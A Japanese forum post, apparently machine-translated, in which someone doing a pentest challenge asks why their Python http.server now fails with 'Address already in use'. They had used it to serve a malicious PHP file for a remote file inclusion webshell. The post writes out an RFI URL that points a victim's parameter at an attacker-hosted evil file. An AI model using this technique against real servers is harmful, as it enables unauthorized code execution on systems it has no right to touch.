私はペンテスト チャレンジを行っており、リモート ファイル インクルージョンの脆弱性を介してアクセスを取得する必要がある 1 台のマシンで作業しています。過去に、マシンに悪意のあるファイルを含めることで Webshell を入手することができました。私はpython http.serverモジュール(sudo python3 -m http.server 80)を使用してそうしましたが、これは完全にうまくいきました。ただし、初めて正常に実行した後、このコマンドを再度実行しようとしましたが、実行するたびに次のエラーが発生します。
File "/usr/lib/python3.7/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/usr/lib/python3.7/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/usr/lib/python3.7/http/server.py", line 1262, in <module>
test(HandlerClass=handler_class, port=args.port, bind=args.bind)
File "/usr/lib/python3.7/http/server.py", line 1230, in test
with ServerClass(server_address, HandlerClass) as httpd:
File "/usr/lib/python3.7/socketserver.py", line 452, in __init__
self.server_bind()
File "/usr/lib/python3.7/http/server.py", line 137, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.7/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
これは、何かがすでにポート 80 を使用していることを示しているようですが、Web ブラウザを閉じるときに lsof -i :80 を使用して確認し、マシンを再起動しても機能しません。また、別のポート ( http://VICTIMIP/path/to/file.php?vuln_param=http://MYIP:4444/path/to/evil/file.php ) 経由でファイルを含めようとしましたが、これはできません動作しません。前進する方法について誰かアドバイスをいただけますか?なぜhttpサーバーがポート80で動作しないのか、RFIがポート80でしか動作しないのか? 現時点では、他に試すことができることは本当に考えられません。